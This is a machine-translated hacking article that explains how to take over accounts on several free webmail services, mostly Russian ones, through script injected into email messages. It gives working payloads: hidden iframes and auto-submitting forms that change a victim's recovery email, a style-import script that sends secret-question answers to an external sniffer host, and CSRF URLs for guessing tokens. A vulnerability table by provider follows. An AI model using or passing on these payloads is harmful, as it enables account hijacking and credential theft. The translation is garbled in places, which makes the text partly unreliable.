This page has been robot translated, sorry for typos if any. Original content here.

OVERVIEW OF THE VULNERABILITIES OF FREE POSTAL SERVICES

We continue to engage in web-mail. I did a little research on various services for hacking and present you the results. The attack technology remains the same: a letter with a JavaScript code that is triggered when opening a letter is sent to someone else’s address, and changes any information in the user’s box settings. It makes no sense to describe each server in detail, since the approach is the same everywhere, so I will give a few examples, and at the end a table. In most cases, the hacking can be considered 100%, with some assumptions: the user must use the web interface to read the letters, while writing the exploits I was guided by a standard platform, that is, I initially assume that the user does not have some kind of exotic OS or JS browser disabled.

WWW.MAIL.RU

I'll start with the number 1 post in Russia. At the moment, thanks to the passing of JavaScript and one developer error, it is possible to crack this mailbox. I believe that the basic principles are well known. How to get a password? 1 - unauthorized change it. Will not work, you need to know the previously installed. 2 - change the secret question and use the service to combat amnesia. Also will not work. 3 - set your alternative Email to receive a new password generated by the system. It will not work, the last two options listed above are in the same form and are also password protected. Even the others, which are of less interest to us, the settings (Name, surname, etc.) can no longer be changed without entering the current password. It would seem that there are no options. However, there is such a secondary in importance, inconspicuous settings section "Contact Information" (ICQ, website, phone, place of work, time zone, etc.). In this section, you can also specify the contact Email. The trick is that at the same time in the registration information the alternative address changes but the one that is registered in the questionnaire, and now you can get a password for the soap, using the reminder service. It's simple. URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru However, the GET method cannot change settings in the mail.ru box, therefore I will describe the technical side of the issue in detail.

I. We send a letter with a code to the necessary box with a code that will generate a frame directly in the body of the letter with a link to our website. If possible, the script should work without any user interaction (click, click, mouse over, image loading, etc.):


 <embed src = "javascript: document.getElementById ('xxx'). innerHTML = '<iframe src = http: //yoursite.yourdomain.ru/yourscript.html> </ iframe>'; this.wav">
 <p id = 'xxx'>
In order to fully ensure the performance of the script, as well as masking, we transform:
 <embed src = "javascript: status = location; document.getElementById ('xxx'). innerHTML = '<iframe src = http: //yoursite.ru/yourscript.html width = 0 height = 0> </ iframe>' ; this.wav "width = 0 height = 0>
 <p id = 'xxx'>
In this form, character codes replace the letters in the name of the javascript and iframe elements, and the mail script does not filter them. Line status = location; creates the visibility of a local URL in the status bar, so that outside flashing does not cause suspicion. The width and height attributes, both frame and embed, are set equal to zero and make them invisible.

Ii. On the http://yoursite.ru resource we place an HTML document with the form for sending the changed data to the mail.ru server.

Content yourscript.html:
 <form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br>
 <input type = "hidden" name = "page" value = "2"> <br>
 <input type = "hidden" name = "Email" value = "hacker@antichat.ru"> <br>
 <input type = "hidden" value = "Save" name = "Save"> <br>
 </ form> <br>
 <script> <br>
 document.anketa.submit (); <br>
 </ script>
Notes: the work of the client part of the script in unchanged form is guaranteed only for IE; The dispatch form is placed on a separate site specifically to “unload” the letter.


WWW.MAIL.COM

Now a slightly different security bug, for example, http://mail.com. If you use the password reminder service, then to get it, it is enough to enter the correct answer to the secret question (one of the options). So we set ourselves the task to get this answer. This is done easily. When I went to the properties of the mailbox and scanned the registration information, I saw that the answer to the secret question is not hidden, which allows us to read its value using JavaScript.

Introduce the script through the style tag.
Address of the settings page: http://mail01.mail.com/scripts/common/genprofile.cgi
Form Name: profileform
The name of the text field with a secret answer: hint_a
As a result, to steal a secret question, you need to call the settings page, run JavaScript, get the value of document.profileform.hint_a.value, and pass it to the sniffer along with the environment variable REQUEST_UR I.

Ready option:
 <style> @import url (javascript: document.getElementById ('out'). innerHTML = "<iframe src = http: //mail01.mail.com/scripts/common/genprofile.cgi name = 'zero'% 6FnLoad = `str = document.zero.profileform.hint_a.value; path = 'http: //zero.h12.ru/stat/capt.php?'; document.zero.location = path + str`> </ iframe>" ); </ style>
 <span id = 'out'> </ span>
In the generated frame with the name zero, the settings page is loaded. After the download is complete, the OnLoad handler runs the script for reading the secret question, and then, via the same frame, sends the response to the sniffer. Now just go to http://zero.h12.ru/stat/log.php, and find the information you need in the "Host" line .

WWW.NEWMAIL.RU

In my opinion, quite a popular mailer, so I will tell about it in detail. Moreover, it is much easier to get someone else’s account on it than it seems at first glance. You can do this: send an email with a script that, when launched, will receive the session id , generate the necessary requests, and change the settings for the altrenative email (to which the password will be sent later) and the secret question and answer. However, if you specify any other address when reminding you, the password will be sent to it, if only the secret answer is correct. And the following observation: the session id to change the settings can not be used at all. Plus, any tags are allowed. All of the above reduces the amount of code to a couple of lines:
 <iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = QUESTION & cp_answ = ANSWER width = 0 height = 0> </ iframe> 

WWW.E-MAIL.RU

The hacking method of e-mail.ru somewhat does not fit into the general theme of the article, but still - mail :) . When I needed to get a password from one mailbox, I normally registered my account and began to investigate the system. The first thing that caught my eye was the ability to set a new password and a secret question with an answer, without entering the old password. The usual action plan: check the tag filtering, get the ID and execute the request. However, to change the settings, the special variable utoken was used, which is contained in the body of the document. Experimenting with changing the question and answer with the previously known utoken:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ panswer= http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ I came to concludes that ID and cookies are not required to change the settings. At the same time, after observing utoken, it was found that the four-digit hexadecimal number after the email address email@e-mail.ru-5a00 lies in a very narrow range. Namely, to establish a secret question with the answer on any box of interest to us, you need to go through all 7 options: 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . When the number is guessed, we get into the right box.

Notes: at the moment there have been some changes. The password recovery service does not work, so it makes sense to change it immediately. Address change settings also changed:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ The method does not work forever. Probably, it is still required that the user from time to time went to the mail via the web .

Table with the characteristics of free WWW-servers

SERVER Javascript VULNERABILITY
www.km.ru
km.ru
img src = javascript: Allows you to read the password from the settings page from the password field
www.mail.ru
inbox.ru , bk.ru , list.ru ,
embed src = javascript: You can change the alternate email
www.mail.com
email.com , post.com , myself.com , consultant.com , etc.
@ import url (javascript:); The settings show the answer to the secret question.
www.newmail.ru
nm.ru , hotmail.ru , orc.ru , nightmail.ru
Any way Read / change question and answer. Password is valid
www.netman.ru and www.mailgate.ru
same mailer. about 80 domains
img src = javascript:, style = background: url (javascript:) You can steal the answer to a secret question, if it is installed. It is also possible to set a forwarding address (copies are not saved)
www.yandex.ru OnError, OnLoad Deleting site * .narod.ru (JS is not required)
www.ukr.net embed src = javasc
ript: this .wav>
Read the answer to your secret question.
www.nextmail.ru
xaker.ru , email.su , russian.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
embed src = "javascript: Swap / steal secret question answer
www.hotbox.ru
pochta.ru , pisem.net , fromru.com , land.ru , and others.
In many ways Account deleting
www.rin.ru embed src = javascript: Read the secret answer